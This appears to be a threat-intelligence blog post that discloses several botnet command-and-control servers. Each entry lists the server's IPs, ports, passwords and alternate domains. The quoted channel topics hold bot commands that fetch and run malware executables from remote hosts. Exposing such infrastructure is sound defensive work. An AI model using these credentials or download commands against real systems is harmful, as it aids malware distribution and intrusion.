Author: I_Post_Ur_Info

x01bkr2.biz (snk asper mod irc botnet hosted by buyurl.net, alibabahost.com)

Uncategorized

Resolved x01bkr2.biz to 94.242.237.128, 37.221.170.208 Server:  x01bkr2.biz Port:  4723 Channel:  #o.O Topic for #o.O is: .dl hxxp://www.mediafire.com/download.php?dqr1p0wz8tpz9tz | .dl hxxp://www.mediafire.com/download.php?uqqhg3equchc7bd Topic for #o.O set by SpliT at Sat Apr 27 17:57:29 2013 The skype spreader downloads messages from hxxp://waxortraxe.org/icon.jpg Alternate domains: zr0x1b9.biz xkzykxb.biz xeyaz.biz Hosting infos: http://whois.domaintools.com/94.242.237.128 Hosting infos: http://whois.domaintools.com/37.221.170.208 EDIT: snk is now desperatelyRead more...

37.235.49.168 (Irc botnet hosted by edis.at)

Uncategorized

Server:  37.235.49.168 Port:  443 Channel:  #test5 Channel password:  :godlol Topic for #test5 is: hacked by team whitehats Topic for #test5 set by Sabu at Tue Apr 23 15:14:29 2013 Example bot nick:  zwin-JJNEXJ|1952| Opers:  [Sabu] (ryan@dildos): ryan[Sabu] @#test5 @#opers @##fuckstamp #chats [Sabu] irc1.molten-wow.com :mw_customer_ircd[Sabu] is a Network Administrator[Sabu] is available for help.[Sabu] sysop[Sabu] idle 16:59:16,Read more...

ppppppp.rsmatcher.com (YABOT irc botnet hosted by China Shantou Shantou Tianyin Technology Co. Ltd)

Uncategorized

Resolved ppppppp.rsmatcher.com to 121.14.212.125 Server:  ppppppp.rsmatcher.com Port:  6971 Server password:  laorosr Channel:  #J Channel topic #J:  .asc -S|.hxxp http://146.185.246.190/7081.exe|.asc exp_all 25 5 0 -a -r -e|.asc exp_all 25 5 0 -b -r -e|.asc exp_all 20 5 0 -b|.asc exp_all 20 5 0 -c|.asc exp_all 10 5 0 -aChannel:  #dpi Channel topic #dpi:  !dl hxxp://146.185.246.190/7384FUD-4-18.exe rsxjs.comRead more...

m.jamtes.com (ngrbot irc botnet hosted by China Hefei Chinanet Anhui Province Network)

Uncategorized

Resolved m.jamtes.com to 60.172.228.177   Server:  m.jamtes.com Port:  7384 Server password:  smart Channel:  #spd Channel password:  smart Channel topic #spd:  !mod pdef on !mdns hxxp://146.185.246.240/avxd.gif !dl hxxp://146.185.246.190/msx6971.exe !dl hxxp://146.185.246.104/dqs.exe !s -o !j #1,#2 !dl hxxps://hotfile.com/dl/203712010/822c38b/skybe.exe Channel topic #1:  !dl hxxp://146.185.246.116/mailsw7.exe !dl hxxp://146.185.246.116/lmqw7.exe !dl hxxp://146.185.246.116/five192w7.exe !dl hxxp://146.185.246.116/five172w7.exe Channel topic #2:  !dl hxxp://146.185.246.116/tefw7.exe !dl hxxp://146.185.246.116/p98w7.exe !dl hxxp://146.185.246.116/p18w7.exeRead more...

beta.uandmearevideos1.com (Betabot http botnet hosted by cheaphosts.ru)

Uncategorized

Resolved beta.uandmearevideos1.com to 146.185.246.147 Server:  beta.uandmearevideos1.com Gate file:  /direct/mail/order.php Alternate domains: beta.uandmearevideos2.com beta.stop2teaseme.com beta.pixartzone.com beta.dietmydart.com beta.worldwipeme.com beta.thegamejuststarted11.com beta.thegamejuststarted13.com beta.thegamejuststarted14.com beta.thegamejuststarted15.com beta.thegamejuststarted12.com beta.thegamejuststarted10.com beta.mypaintdress.com Hosting infos: http://whois.domaintools.com/146.185.246.147

proxylegitconnect.com (Reverse proxy malware hosted by ecatel.net)

Uncategorized

Resolved dq.proxylegitconnect.com to 89.248.172.174 Resolved bren.proxylegitconnect.com to 89.248.172.145 Servers:  dq.proxylegitconnect.com, bren.proxylegitconnect.com Port:  8800 Based on the port and subdomains, this is the same guy as this previous post. Hosting infos:  http://whois.domaintools.com/89.248.172.174 Hosting infos:  http://whois.domaintools.com/89.248.172.175